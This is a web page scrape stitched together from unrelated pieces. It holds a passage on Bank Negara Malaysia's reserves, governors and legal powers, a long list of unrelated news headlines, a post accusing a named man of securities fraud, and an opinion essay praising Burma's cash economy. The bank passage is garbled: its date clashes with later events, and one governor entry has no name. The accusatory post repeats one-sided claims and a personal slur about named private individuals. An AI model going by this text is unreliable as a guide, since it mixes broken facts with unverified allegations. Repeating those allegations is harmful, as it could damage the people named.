Bank Negara Foreign Exchange Reserves (Source: Bank Negara, rounded to the nearest billion USD)

30 December 2008

Bank Negara continues to run negative interest rate differential to USD. The ringgit has appreciated gradually since the peg was abandoned and as at 28 May 2007, it traded at around 3.40 to the US dollar. Malaysia's foreign exchange reserves have increased steadily since the initial capital flight, and as at 31 March 2007 the reserves stood at approximately USD88 billion, which is approximately USD10 billion more than the reserves just prior to the peg being abandoned.

On 31 July 2007 the Malaysian reserves stood at approximately USD98.5 billion which is equivalent to RM340.1 billion. The figure increase to USD 101.3 billion in 31 December 2007 which is equivalent to RM335.7 billion. [ 2 ] Bank Negara's international reserves increase further 15 days later to USD 104.3 billion or MYR 345.4 billion. [ 4 ] [ 5 ]

Governors of Bank Negara

Tan Sri W H Wilcock

January 1959 - July 1962

Tun Ismail bin Mohamed Ali

July 1962 - July 1980

Tan Sri Abdul Aziz bin Taha

July 1980 - June 1985

Tan Sri Dato' Jaffar bin Hussein

June 1985 - May 1994

Tan Sri Dato' Ahmad bin Mohd Don

May 1994 - August 1998

Tan Sri Dato' Seri Ali Abul Hassan bin Sulaiman

September 1998 - April 2000

May 2000 - Current

Headquarters and Branches

Bank Negara Malaysia.

The Bank Negara headquarters are located at Jalan Sultan Salahuddin; off Jalan Kuching. Bank Negara is geographically located at latitude (3.1518 degrees) 3° 9' 6" North of the Equator and longitude (101.6926 degrees) 101° 41' 33" East of the Prime Meridian on the map of Kuala Lumpur .

Bank Negara had previously maintained branches in each of the state capitals. Most of them were closed in the 1990s when retail banks began taking over most of the counter services. There are still branches maintained in Penang. Johor Bahru. Kota Kinabalu. Kuching. Kuala Terengganu and Shah Alam. Some branches were converted into currency distribution and processing centres.

Bank Negara also retains representative offices in London and New York City. and a personnel training centre in Petaling Jaya. Malaysia .

A new building for the Financial Services and Resources Center (FSRC) was constructed in 2004 to house the FSRC, SEACEN, IFSB and the FMAG (the museum arm of Bank Negara). Located along Jalan Dato Onn, in front of the Tun Hussein Onn Memorial, the building was designed by renowned Malaysian architect firm, Hijjas Kasturi Associates. Officially declared opened in August 2011, the building is now known as Sasana Kijang.

Powers of the bank

The bank is endowed with certain powers through establishment of legal Acts by the Parliament of Malaysia to help fulfill its objectives. New legislation are created and current legislation is amended to reflect the needs of the time and future.

Exchange Control Act 1953

Allows the bank to confer powers, and impose duties and restrictions in relation to gold, currency, payments, securities, debts, and the import, export, transfer and settlement of property, and for purposes connected with the matters aforesaid. [ 6 ]

Central Bank of Malaysia Act 1958

Provides the establishment, administration and powers of the bank. [ 6 ] This act has been repealed with Central Bank of Malaysia Act 2009 starting on 25 November 2009. [ 7 ]

Central Bank of Malaysia Act 2009

Redefined the central bank roles which was not covered in the previous act. The central bank can now define monetary policy autonomously through Monetary Policy Committee. The bank also now have greater regulatory reach and oversight than before. The act also give recognition that conventional and Islamic Banking is running in parallel in Malaysia. [ 7 ]

Islamic Banking Act 1983

Provides licensing and regulations of Islamic banking in Malaysia [ 6 ]

Banking and Financial Institutions Act 1989

Provides laws regarding licensing and regulation of banking institutions in Malaysia. [ 6 ]

Takaful Act 1984

Provides regulation for takaful business in Malaysia [ 6 ]

Insurance Act 1996

Provides licensing and regulations for insurance business and financial advisory business. [ 6 ]

Money-Changing Act 1998

Gives the bank the power to license and regulate money changing business in Malaysia.

Anti-Money Laundering and Anti-Terrorism Financing Act 2001

This act is actually renamed from a previous act. The act provides powers to the bank to prevent money laundering and terrorism financing. [ 6 ]

Development Financial Institutions Act 2002

Promotes the development of effective and efficient development financial institutions. [ 6 ]

Payment Systems Act 2003

Regulations of payment systems. [ 6 ]

See also


Gregory J. Millman, Around the World on a Trillion Dollars a Day, Bantam Press, London and New York, 1995.

enlaces externos

Historic new parliament opening in Myanmar

Roach expects Bradley to revert to old fighting style in third Pacquiao fight

US leads 14 strikes against Islamic State in Iraq, Syria - statement

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Avon reaches deal with Barington Capital over board seat

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Taiwan arrests 41 Chinese poachers in South China Sea

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V Air inaugural touches down in Manila

Tarlac mayors back Marcos’ bid for vice president

Ex-solon, Ma guilty -- Sandigan

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Comic book depicting Mar as hero draws flak

Noy questions policies of Roxas’ rivals

Oil firms to raise gas prices today

Duterte wishes rivals long life on his birthday

PCGG launches ‘exhibit’ of Marcos jewelry online

Comelec website hacked

LLDA chief Acosta, mom get 10-20 years over PDAF

Deguito to skip Senate probe

4 drown in Batangas, NE resorts

Ex-Baler top cop, 2 others charged for rookie policeman’s death

Chiz brushes off Marcos-Poe tie-up talk

Alder BioPharma s migraine drug succeeds in mid-stage study

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Tama bang gawing ‘crime czar’ si Col. Querubin?

LLDA chief gets 10 years for graft

Kesha returns to haunted guesthouse to seek out sex ghost

Free college for all eyed

Yedda to continue Martin’s ‘malasakit’

Japan concerned at possible Russian base on disputed island chain

- Channel News Asia

Double Treat for Mazda MX-5, Wins World Car World Car Design of the Year

2017 Kia Cadenza says Hello at New York International Auto Show

All New Toyota 86 is Here, As Expected Looks Similar to Subaru BR-Z

Fewer Philippine banks in 2015

Nasaan na ang mga dating hosts ng Eat Bulaga ?

Petrova denies wrongdoing after positive meldonium test

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Wall St. set to open higher after consumer spending data

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US consumer spending tepid, inflation moderates

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Reebok Spartan Race heads to heartlands on May 7

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Riders demand probe into Demoitie death

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Dion Ignacio spends birthday with lolos and lolas of nursing home

Hele sa Hiwagang Hapis Review: No greater love

Japan s NTT Data agrees to buy Dell s IT services unit for US$3 bln

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India looks to bury Italy feud to achieve bigger ambition

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RugbyU: Marler taunted too, say Quins as gypsy row continues

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3 killed, 5 hurt in GenTri mishap

Driver dies as FX fall into 10-foot ravine

Israeli taking selfie falls off Banaue riprap

‘Eat Bulaga’ Kalye-serye Recap: Going strong

Solenn Heussaff gets her dream dress for the big day

Farmer stabbed 8X by son-in-law dies

Cops probe Laguna gun attack

ASG man slain, 2 others hurt in Basilan clash

CIA boss Brennan visited Moscow in early March - Interfax

- Channel News Asia

Mother pleads guilty to causing grievious hurt to 4-year-old son

- Channel News Asia

Russia s Putin, Iran s Rouhani agree to intensify contacts - Kremlin

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Solenn Heussaff gets her

Mikael Daez shares painful experience in Cambodia while filming Fight For Love

Goodbye showbiz, usung-uso

Gold s shine rubs off on mining stocks

- Channel News Asia

Drew, Iya expecting first baby

Hanggang Makita Kang Muli: Care for Angela

Bangladesh court rejects scrapping Islam as state religion

SHORT FILM: Kat s Diary

China destroys 35 tons of PH bananas

Duterte camp accuses LP of terrorism, vote-buying

Land ownership must remain exclusive – Chiz

Suicide bomber kills 65, mostly women, children in Pakistan park

- Channel News Asia

LOOK: Raymart Santiago meets Steven Seagal

Aquino environment adviser Acosta guilty of misusing pork barrel

Daily News Highlights - March 28, 2016 Edition

Bukit Batok by-election: Registers of electors to be updated

- Channel News Asia

US contingent for Balikatan exercises arriving today

Putin hails Palmyra recapture, trumpets Russian role

- Channel News Asia

Night fishing

Jason Day beats Oosthuizen in Match Play final

- Channel News Asia

Rookie Willie Cauley-Stein stars as Kings down skidding Mavericks

Tennis: Australian Open champion Kerber advances at Miami Open

- Channel News Asia

3 men in Brussels attacks charged

Australian Open champion Kerber advances in Miami heat

- Channel News Asia

Japan opens radar station close to disputed East China Sea islands

- Channel News Asia

Pakistan Easter suicide attack kills 72 in Lahore

- Channel News Asia

Smuggled sugar seized

LOOK: Sino ang kamukha ng baby nina John Prats at Isabel Oli?

Ousted lawmaker hits SC ‘double standard’ in Poe case

Local campaign kicks off: Mayor wounded, 2 supporters shot dead

Honduras arrests suspect in murder of environmental activist

- Channel News Asia

Facebook sorry for pushing Pakistan Safety Check worldwide

Sanders beats Hillary in 2 states

Algeria helicopter crash kills at least 12 soldiers - ministry

- Channel News Asia

Facebook apologises for Safety Check glitch after Pakistan blast

- Channel News Asia

What you need to know about the local races

Comelec website hacked

Facebook mistakenly pushes Pakistan Safety Check worldwide

Anti-terror coalition military chiefs meet in Saudi

Pakistanis hunt for militants behind blast that killed at least 65

- Channel News Asia

Army official: Balikatan exercises not directed to China

North Carolina beats Notre Dame to reach Final Four for the first time in seven years

Juani Guirado calls it quits, set to skipper Azkals in farewell match vs North Korea

#BaliHeat: Sarah Lahbati’s sexy photos in Bali!

WATCH: Ang Bastos video of Kim Domingo goes viral

Rowing: Cambridge win University Boat Race

- Channel News Asia

Suicide bomber kills 65 in Lahore

- Channel News Asia

Lim confident of regaining Manila City Hall

Squash: El Sherbini makes history for Egypt with British Open win

- Channel News Asia

The report of the guard

Bulgarian triple jumper Petrova tests positive for meldonium

- Channel News Asia

PAF to buy P70-M spare parts for attack helicopters

Climate change threatening Philippines’s food security

Trump questions NATO, Asia nuclear weapons ahead of Washington summit

- Channel News Asia

Migrants rush to Greek camp on rumours border will open

- Channel News Asia

Pakistan suicide attack kills 65 celebrating Easter in Lahore

- Channel News Asia

England goalkeeper Butland suffers fractured ankle

- Channel News Asia

Football: Butland faces Euro exit after fracturing ankle

- Channel News Asia

Houthis swap prisoners with Saudi Arabia - spokesman

- Channel News Asia

An end to the Cold War

Mali arrests two in connection with Ivory Coast al Qaeda attack

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Cycling: Belgium s Demoitie dies after motorbike smash during race

- Channel News Asia

Aquino on staycation

Tennis: Top-ranked Djokovic powers into Miami last 16

- Channel News Asia

South Korea set for record IPO year as conglomerates prepare to sell family silver

- Channel News Asia

Two hurt after tree falls on vehicles in Boon Lay

- Channel News Asia

Saudi-led alliance confirms Yemen prisoner swap

- Channel News Asia

NHG looks to gaming technology to boost healthcare sector

- Channel News Asia

China destroys 35 tons of PH bananas

On Black Saturday, locals report Mt Apo fire

One Cebu Party drops Binay, Una

Nothing wrong with coal plants – Duterte

PBA employees demoralized after being told to undergo lie-detector tests in probe into Montreal leak

Daily News Highlights - March 24, 2016 Edition

Ara Galang, Mika Reyes spending Holy Week break to rest, recharge, and reflect

Road closures in Manila on March 28 for Erap proclamation rally

Poe grateful for latest Pulse Asia survey results

Accenture revenue rises on strong consulting growth

- Channel News Asia

Maine Mendoza on Alden Richards s Boracay Surprise:

Morocco s UN expulsion puts Western Sahara ceasefire at risk - movement

- Channel News Asia

Baby Zia is a climate warrior in the making, says dad Dingdong Dantes

Daddy Bae, bumigay sa panonood ng God Gave Me You ng AlDub?

Gary David dilemma gives players all the more reason to revive union, says Miller

LOOK: Bubble Gang bikini battle in Laiya, Batangas

US sub docks in Subic

Duterte camp accuses LP of terrorism, vote-buying

Oil slide, strong dollar drag Asian shares lower

LOOK: Marian Rivera shows off sexy body in a two-piece bikini

US jobless claims revisions show stronger labor market

- Channel News Asia

FIBA battles for control of European basketball

Trump, Cruz feud over wives simmers online as attacks get personal

- Channel News Asia

Duterte guns for presidency with vow to bury crime

China says vaccine scandal suspect was free to re-offend

- Channel News Asia

Iraq s Sadr may extend sit-in to demand reforms: TV

- Channel News Asia

Morocco says arrests nine suspected Islamist militants with Libya ties

- Channel News Asia

Land ownership must remain exclusive – Chiz

Eiffel Tower lit with Belgium s colours after Brussels attacks

- Channel News Asia

Suicide bomber kills 65, mostly women, children in Pakistan park

- Channel News Asia

‘Hindi tuwid ang daan sa bayan ni PNoy’

10 sexiest photos of Kim Domingo

Dating DBP official hinatulan

BofA settles claims it cheated Merrill trainees out of overtime

- Channel News Asia

Deped not ready for K-12 program

Basilan treasurer faces raps

16 stars who look sexy in bikinis

New Zealand post 145-8 against Bangladesh in World T20

- Channel News Asia

Tennis: Serena, Murray blast Djokovic on level prize money

- Channel News Asia

Ex-PDEA chief barred from visiting Marcelino

Duterte s birthday plans: I ll just sleep

Paolo Ballesteros reunites with his brother Jamie

Activist fund seeks to replace Yahoo board

Pagsubok: A perfect love in an imperfect situation

Spieth struggles to explain another poor round

- Channel News Asia

Maine Mendoza on Alden Richards s Boracay Surprise: You made me very happy.

Duterte camp accuses LP of hatching black propaganda

Blackrock trials new financial messaging system

- Channel News Asia

Behind the scenes of God Gave Me You, the Eat Bulaga Lenten special

Solar plant to replace rice lands in Rizal town

Jennylyn Mercado at Tom Rodriguez, tampok sa Pagsubok ngayong Sabado de Gloria

WATCH: Michael V. creates “leap of fake” video

LOOK: Raymart Santiago meets Steven Seagal

Tennis: Nadal retires from match for first time in six years

- Channel News Asia

16 stars looking sexy in bikinis

Sarah and Matteo to wed this year?

Senate to close chapter on William Go at 3rd hearing on stolen funds

Robin Padilla leads new peace movement

Starboard to launch proxy fight to remove Yahoo s entire board: WSJ

- Channel News Asia

Lovi Poe moves in to her new home

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Police investigating NSF who leaked photo of dead SMRT worker

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Ibrahim Ali calls Guan Eng a pot calling kettle black

Bodyguard Of Businessman Shot In Sepang, Seriously Injured

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Khairy should be held responsible for scandal, says NGO

Government Should Embrace The Internet, Not Impose More Restrictions To Stifle News Portals And Blogs

Powerbank explodes inside car glove compartment

Logitech G Introduces Its Best Gaming Mouse Yet With Professional-Grade Wireless

Harap Ku Li waras ketika tandatangani Deklarasi Kelantan – Anina

Honor Announces Trade-In Program On VMALL. MY

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60 Minutes Australia: Dirty Secret

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Hiep Trinh's stock sales

Beware of Scam Artist, Hiep Trinh

Watch out for scam artist Hiep Trinh, aka Alex Trinh

This man is preying on old people, women and Vietnamese in California, Michigan and Texas. He offers to sell stock in Turan Petroleum, Inc. NRG Resources, Inc. and other companies while he is under the State of California’s restraining order not to sell securities. The Orange County Superior Court issued an injunction order on 02/17/2011 against Hiep Trinh from violating California securities laws. (30-2010-00389990-CU-SL-CJC)

His Methods of Operation: He takes investors to Morton’s Steakhouse in Costa Mesa or the Pacific Club in Newport Beach to impress them with his fake wealth. He buys them fancy dinners, expensive wine and then induces them to invest in his companies. He charms women, jewelry shop owners to sell them his own shares in these companies. The man knows no shame.

He told investors in 2006 he invested millions of dollars in his companies. Yet he filed for bankruptcy in 2004, declaring zero assets.

He promises to take his companies public while he is banned by FINRA (Financial Industry Regulatory Authority) (formerly NASD, National Association of Securities Dealers) from associating with its members. This man cannot take any company public.

He told investors of his and his friend and business partner, Yuri Vanetik’s powerful political connections to gain the investors’ trust and confidence. Hiep Trinh and Yuri Vanetik were partners in Private Equity Management Group. Hiep Trinh told investors that Yuri Vanetik’s father, Anatoly Vanetik considers him as his own son. His business partner and best friend, Yuri Vanetik and he were big contributors to the Republican party and Yuri is member of the “Republican National Committee Team Eagles” and one day, Yuri Vanetik would be appointed to a Republican cabinet. They knew many people in high places. Hiep Trinh told investors in many occasions that someday he, too, would be appointed ambassador. See www. huffingtonpost. com and www. campaignmoney. com.

In order to impress investors and their friends and to show them that he and his friend, Yuri Vanetik knew people in high places, Hiep Trinh invited investors to President Bush’s ranch in Crawford, Texas for a Republican National Team Eagles private meeting with the President as well to Washington to attend the Republican National Committee’s meetings and to have pictures taken with President Bush and other republican dignitaries.

In 2007, to impress investors and to show them that he knew people in high places, Hiep Trinh invited them to a fund raising, that HE HOSTED for Presidential candidate, Mayor Giuliani. He told investors that with the contributions he and his friend Yuri Vanetik donated, he would be ambassador if his candidate got elected. He sent investors his picture with President Bush to impress them with his political connections.

The Victims: We were induced in buying his stocks in 2005 and 2006 with the promises his companies would go public in a few months. That was 6 years ago. Nothing has happened. Now he is being sued by more than 40 investors/stockholders and the State of California. 1. State of California sues Hiep Trinh for securities fraud on 07/15/2010 in OC. (30-2010-00389990-CU-SL-CJC) 2. Michael Mai and more than 20 investors sue Hiep Trinh for fraud and breach of contract on 12/30/2008 in OC. (30-2008-00116741-CU-BC-CJC) 3. Tony Nguyen sues Hiep Trinh for fraud and breach of contract on 10/21/2008 in OC. (30-2008-00113558-CU-BC-CJC) 4. Hector Salazar and six investors sue Hiep Trinh for fraud and Breach of contract on 04/06/2007 in OC. (07CC04698) 5. Son Bui sued Hiep Trinh for fraud on 06/01/2009 in OC. (30-2009-00123962-CU-BC-WJC) 6. Khanh Mai sued CMS (one of Hiep’s many front companies) for fraud and breach of contract on 12/19/2007 in San Jose. (1-07-CV-101330, California Superior Court, Santa Clara county) 7. Son Bui sued Hiep Trinh for fraud & breach of contract on 10/15/2008 in Clark county, Nevada. (A569048, Dept. X) 8. Turan Petroleum, Inc. sued Hiep Trinh for securities fraud in US District Court on 10/23/2008. (CV 08-07017 CBM) 9. Private Equity Management Group sued Hiep Trinh on 08/08/2008 in OC. (30-2008-00110381-CU-BT-CJC) 10. Hiep Trinh was sued by his own attorneys, Greenwald & Hoffman on 09/03/2010 in OC. (30-2010-00405412-CU-CL-CJC) When he heard that the sons and daughters of South Vietnam’s fallen soldiers wanted to raise money to restore the national cemetery where their fathers were buried, he offered to double or triple their investments so they can use the additional profits for that noble cause. That was in 2007. Nothing happens since then, no investor’s reports, no profit statement, no public offering.

His Background and the Evidences: This man has been sued so many times, filed for bankruptcy, lost his stockbroker’s licenses, was banned by the US government from working in financial institutions ever again for stealing bank customer’s money. &toro; Hank Rivera, a disabled bank customer sued Hiep Trinh on 02/02/2001 for stealing $10, 000 from his personal injury settlement fund at Cal Fed bank in Orange county. (Hank S. Rivera v. Hiep T. Trinh, Case No. 04CC02020. OC Superior Court) • Joseph Aguilar sued Hiep Trinh for investing his funds in a fraud, Ponzi scheme orchestrated by Concord Capital Enterprises and Scott Yoshizuma. Yoshizuma went to prison. Hiep Trinh was ordered to disgorge $656, 029.97 by the Security and Exchange Commission. He filed for bankruptcy. (Joseph Aguilar v. Hiep Trinh, Case No. 02CC17493, Orange County Superior Court 11/21/2002) • Hiep Trinh was banned by the United States Office of Thrift Supervision (OTS) from ever associating, working with any financial institutions for stealing bank customer’s money. (OTS order No. SF-01-008, September 7, 2001) • Hiep Trinh was banned by NASD (National Association of Securities Dealers) from associating with any NASD (now FINRA) members on 05/07/01. (NASD No. C02010024, CRD#2458464). He lost all his investment licenses. &toro; Hiep Trinh was former partner of Private Equity Management Group that was sued by the Securities and Exchange Commission for fraud on 01/07/2010. (CV 09-2901 PSG US District Court, Central District of California)

His shame: * With the profits from his stock sales, he threatens to sue any complaining investors to intimidate, to retaliate, and to scare them from going to the authorities. His game plan is to counter-sue, to drag out lawsuits to make anyone who sues him incur huge legal fees and run out of money. * He warned investors that for every $1, 000, 000 he took in, he put away $100, 000 for future legal fees and would still come out ahead. * He bragged to his employees that once he had the investors’ money he could do anything he wanted with that money even gamble in Las Vegas. He is known to frequent local casinos, Hawaiian Gardens, Commerce Casino, Hustler… * He bragged to many people that his money is being hidden overseas in Hong Kong and Europe. * He told his employees that if he had to sell his mother to make money he would. * He stabbed his friends in the back. He said his friend Yuri Vanetik was gay and was developing a pornographic web site. * He retaliated against people who sued him to recover their investments by filing frivolous lawsuits. * He retaliated against people who sued him to recover their investments by posting false and unsubstantiated complaints and dirty personal attacks on the internet. * He received commissions for selling stocks of his own companies. * He sells his own stocks that he got them for free to investors, depriving the companies of needed operating funds. * He never discloses to investors that he lost investment licenses, is banned by the US Office of Thrift Supervision and FINRA (NASD).

If this man approaches you to sell stocks, please call the California Department of Corporations at (619) 525-4043 or email at jtsai@corp. ca. gov. If you are his victims, please call the California Department of Corporations at (619) 525-4043 or email at jtsai. corp. ca. gov. You might receive your investment money back.

Guest Post: A World Without Banks

A World Without Banks

Imagine a world without bankers.

That thought either rattles you to the core of your being, or it brings on the kind of ecstasy heretofore only available in a Southeast Asian massage parlor. If you are a Congressman, addicted to the effluent from the wallets of your owners on Wall Street and their lobbyists in Washington, if you are a real estate developer who believes no amount of office space and no amount of luxury condominiums is too much, or if you summer in the Hamptons and Nantucket, then you are clearly in the first camp. If you are a typical ZH’er, spending your weekends at the range with your Beretta or sharpening the tines on your pitchfork, then welcome to SE Asia and the world of your wildest fantasy.

Yes, there is a country without banks as we know them, where no one knows the meaning of subprime, Alt-A, securitization, HFT, prop desks, insurance---portfolio or otherwise---CDS’, CDO’s, CDO^2’s, CLO’s or Too Big to Fail. There is a country where the financial crisis went almost unnoticed, where no bank assets went toxic because there are no bank assets. No depositors faced loss because there are few depositors. Mortgages did not take a hit because there are no mortgages. No car loans, student loans, or HELOC’s went bad. The country is the Union of Myanmar, known to many in the West as Burma. It is also called the Golden Land, which is entirely apropos given its wealth of natural resources.

Many reading this might have a political view on the country and its leadership, to which you are most welcome. Other websites, other writers, and the activist community address that issue elsewhere and have been doing it almost as long and almost as successfully as America has been enforcing sanctions against Cuba. I’ll leave politics to them, for this is not a political fluff piece; it is an economic fluff piece.

While much of what you will read here will seem odd, please don’t let the bizarre nature of this system scare you off. What they have, albeit in a different form, is workable even in a large society. If any of you find humor in this piece, then that is good enough, for at times like this humor is what keeps some of us going. More than that, however, I write this to attempt to counteract the fear mongering foisted upon us all by the likes of Hank Paulson, Timmy Geithner, Ben of the Inkjet Bernanke and that drooling, semi-embalmed cadaver who goes by the name of Representative Paul Kanjorski.

“We were that close”, so they told us ad nauseum in order that we accept the passage of TARP and all of the other alphabet soup of programs that shifted the wealth of America’s savers, elderly and Middle Class to the same people on Wall Street who nearly brought the system---their system---down. Yes, the collapse of the financial system would have had dire consequences---for the ones who caused its near demise. Their world almost did cease to exist, and it would have eviscerated them, one and all. Sadly, we lost an opportunity. Our world, on the other hand, though difficult, would have survived, and we would have found a way to continue. Humans are resourceful. Humans adapt. Anarchy creates its own communities, its own bonds, out of necessity and the will to survive. Burma is an example. Now I’ll tell you why.

Let me begin by getting a salient point right out front: Burma’s economy probably grew 15% in 2009. Fifteen percent. Their currency was the world’s strongest currency in 2009, climbing against everything from the dollar to euro to swissie to loon.

Nobody really knows the actual GDP number, because no one really bothers to keep track. Much of the economy is of the underground variety, and even the official economy is cloaked in secrecy. Fifteen percent---which would be the top growth in the world amongst countries with a population greater than 50 million souls---is my own estimation based on what I see, and comparing it to what I have seen there over the last fifteen years, or over the last thirty in places as diverse as Saudi Arabia, Japan, China, Thailand and Burma. 2009 was staggering in the amount of development, as anyone who spent time in the country could attest. Why I am there and why I know this is a long story. Suffice it to say I left a host of Wall Street prop desks when I thought my pockets were full enough, and when I wanted to try to find a way to add value in the world while I was still young. As most of you believe, if not know for a fact, Wall Street adds precious little value to the greater good of the human species. It’s a nice place to visit but I wouldn’t want to live there. I mean Wall Street, not Burma.

It is possible not every country could do what Burma has done. Few countries in the world have the breadth and depth of natural resources Burma has, which include economically significant deposits of gold, platinum group metals, silver, antimony, molybdenum, copper, nickel, iron ore, zinc, tin, uranium, chromite, rare earths and gypsum. Burma also has approximately eighty-five percent of the world’s remaining tropical hardwoods, including the world’s best teak, plus stunningly beautiful woods such as padauk, pyinkado and yemane. Burma has most of the world’s top jadeite, gobbled up to the tune of a billion dollars a year by the emerging Middle Kingdomites. It has precious gemstones such as rubies, sapphires and spinels. Its biggest source of wealth in recent years has been natural gas, plus some oil, which accounts for upwards of 80% of government revenues. Major investors in the country---mostly in mining and oil/gas exploration---include China, (both public and private sector), Singapore, Thailand, India and Russia. Also trying to exploit Burma's vast natural wealth are companies from Malaysia, Vietnam and Australia. A gas pipeline run by France's Total and US Chevron (oddly exempt from the sanctions that prevent me from even buying a home-sewn shirt) is single handedly responsible for nearly 25% of total Myanmar Government revenues via a long term sales contract with Thailand. As with the financial industry, lobbying Congress has its benefits, allowing Chevron privileges denied to you and me and the other lesser members of our egalitarian society. TransOcean (RIG) is also allowed to lease drilling rigs, at $210,000/day, to a project controlled by a company called Asia World, run by a man name Lo Hsing Han and his Harvard MBA educated son Steven Law. Google that and ask US Dept of Treasury, Office of Foreign Asset Control, why RIG gets an exemption. I am not criticizing the Burmese here; I am calling America a hypocrite nation, however.

At present China is constructing two new pipelines from the Arakan (Yakhine) Coast on Burma’s western side to Kunming in China's Yunnan Province. One line will carry Burmese natural gas; the other will carry oil obtained from the Middle East, enabling China to bypass the dangerous Straits of Malacca and save 14-20 days shipping costs. Burma will reap billions from this, despite the odd fact that 35% of its standing army will be involved in guarding the two lines. India just paid $1.4 billion for gas exploration rights in an offshore block off Yakhine and for a 12.5% stake in the twin pipelines. Of course that’s small money for a hedge fund type who bet on TBTF in America, but it’s enough to make it boom time in this all but bankless society.

Situated between the two largest populations on Earth---China and India---both of which are hungry for resources, has undoubtedly benefited Myanmar and helped it pass through the crisis the rest of the world experienced full bore. Still, the other thing that helped it avoid financial calamity was its lack of banks, because people were always forced to pay as they went. Lack of banks and insurance does not prevent dealmaking or trade, it just means that it must be self-financed and self-insured. Projects are carried out only when they are paid for up front, and if a project fails, the loss is born by the owner. Goods are moved with the acceptance that losses are possible, but goods are still moved, potential loss factored in to prices. There’s trucks on the highway carrying manufactured goods, produce, and people. Homes get built, as do office buildings, restaurants and shopping centers. People only buy what they can afford because if they cannot afford it, nobody will sell to them. Other than neighborhood loan sharks who charge upwards of 5% per month, there is almost no debt. Growth comes only from what one can pay for in the here and now. That encourages saving, though most savings are of the cash-under-the-mattress variety. Business still gets done. Banks can be an aid, but they are not a necessity. Eating and having shelter are necessities, and these will happen with or without banks, whether it's in Burma or America.

In the end, rather than shift risk around the economy so that it eventually ends up in the hands of those least able to weather it (AIG), risk stays with the risk taker in a bankless/insurance-less world. People, or firms, do not impose their own burdens or ineptitude on to others. One might argue it’s a better form of capitalism. It is certainly more fair than you and me paying for AIG’s FP Desk stupidity.

The Greeks used to say “everything in moderation”, though the last few months have shown the world that that belief is as decayed as the frescoes on the Parthenon (except for the ones ‘liberated’ by Lord Elgin). Humans, if given the chance, will forever shy away from moderation. Too much is never enough. Banks may occasionally do a little bit of God’s work in congregating and allocating capital, but they do much more of the devil’s work. Bank profits come from Oscar Wilde-ing society (“the only thing I cannot resist is temptation”), whether it is in the form of indebted consumers or customers chasing yield (these are the ones Blankfein, in a bold faced lie in front of a Congressional hearing, called “sophisticated investors”.). Easy credit encourages people to over consume, and over consumption always leads to obesity, either in body or in debt. Americans are textbook examples of both: fat and indebted. They are addicted to immediate gratification, so much so that it is almost held up as entitlement. The junkie, however, does not get rich; the pusher does. If the pusher becomes rich enough, he eventually owns society.

Banks also over consume, in that they continue to rope in consumers and institutional customers until the bank itself becomes obese. Unbridled greed, or uncontrolled appetite, as we have come to learn all too well, leads to Too Big to Fail. No limits on the consumer leads to no limits on the banks which then leads to the dire situation in which we find ourselves now. Indebted consumers, however, lack the ability to manipulate our democracy. Bankers do not. That is why Goldman Sachs get bailed out and why you and me must pay for it.

The Burmese, whose society lacks this negative feedback loop, are puzzled by what happened to us. Exploding debt? What’s that? Para ellos. it is buy what you need or want only when you can afford it. Given the chance they would have become like us. That lack of opportunity saved them from what we now have.

A change of lifestyle, necessitated by a sudden change in a society where debt is almost impossible to obtain, would not be easy for spendthrift Americans, but living on a pay-as-you-go basis imposes a kind of discipline most Americans need. It would hurt, but it could be done. Losing Bank of America, Goldman Sachs, JPMorgan, Citibank and Wells Fargo would not have destroyed America, though it would have given a kick in the teeth to Lloyd and Jamie and their ilk. Like the Burmese now do, however, we would have survived and found a way to deal with the new reality. We might even be better off, rather than having to pay off---and having our offspring continue to pay off---the mistakes of the Blankfeins and Dimons and Fulds and Mozilos and McMansion buyers. We will never know, because the powers that be did not allow us to see that alternative. They tried to scare us, then ignored the vehement public opposition to TARP and passed it anyway. And some criticize Burma for a lack of democracy! Congress and the powers that be did not allow big bank failure, because for them the alternative would have been horrible in lost bonuses and lost contributions. For the rest of us, we may well have been better off. At the very least, we wouldn’t be working until May each year to fund, via our taxes, the bonuses and lifestyles and re-election campaigns of those who blew it.

Another plus is that if we as a society jumped off the over consumption bandwagon for a while, we might have had time to rediscover each other, which might also have necessitated that we all develop personalities again. I'll end this segment with a curious observation. I am two days out of Yangon at this moment and in Tokyo. In Yangon I often take a break in a local tea shop, full of crowded tables where people are chatting, joking, romancing and just passing time with others of the same species. In Tokyo today, which is a society very much like the US, I sat in a Starbucks and saw twenty people, all sitting alone, playing with their laptops, iPods, iPhones, Kindles and assorted other gadgetry that allows them to exist alone in their own soul-less world. Is that what we really want?

If you wish to continue reading, it gets a little fluffy and travelogue-ish here, but you might find it amusing. What the heck, have a read.

Now banks do exist in Burma, they just are not like any bank you know. The best description is that they are glorified Western Union offices, since almost all bank business involves domestic cash money transfers.

I should mention here that Burma is a cash society. Credit cards were tried for a period in the earlier part of the decade, but were just as quickly eliminated. If you come here, forget your Visa, Mastercard or Amex; they are not accepted. All purchases are cash and none is on credit. That includes real estate and cars. If you want to buy a house, you deliver the purchase price in physical cash to the seller. The same thing for a car.

At first you might not think this is such a big deal, suspecting as you probably do that since Burma is a poor country (per capita income around $250/year), prices cannot be too high. You would be wrong to think that, for two reasons.

The first reason is that up until very recently, the largest note in circulation in Burma was the one thousand kyat note (they just introduced a five thousand kyat note). Converted to dollars, that makes the largest piece of fiat paper in circulation the equivalent (at current black market rates) of one US dollar.

The second reason you would be wrong is that both real estate, and car prices in particular, are quite high. Real estate appreciation over the last seven years in some of the most sought after parts of the former capital city of Yangon (the new capital of Naypyidaw is only a few years old) approaches five thousand percent. That is, a piece of land that sold for $100K in 2003 now sells for $5 million. Car prices are worse, impacted by import restrictions that keeps the supply of vehicles significantly less than the demand. How much below demand? Try this: a 1981 Toyota Corolla Station Wagon in white (until 2000 this vehicle represented approximately 80% of all road going passenger vehicles) currently sells for US$20,000. A 1992 Toyota Mark II, the present fan favorite, fetches US$46,000. Top-of-the-line Toyota Landcruisers recently went for US$540,000, though prices have come down a bit as of late. These prices are not for pristine, cherry examples; these are for all of a given make/model/year, as if it were a commodity. The lack of internal upholstery, bare metal roofs and floors, hand-held windshield wipers operated by a long-armed front seat passenger (me). none has any impact on the value. One is as another. My typical ride has four of six windows, which may or may not open, little or no side upholstery, and a hole in the floor through which I can see the passing road. In some of them zero to sixty times are still being determined.

Banks do not make car loans, though one bank tried in the past and went bust. Lessons were learned from that, as they should be in a capitalist system. A car buyer must ferry the bales of cash to the seller before he or she can take delivery of the chariot, which creates a kind of barrier to entry for car ownership in that one almost needs to already own a car to carry all the cash required to buy one.

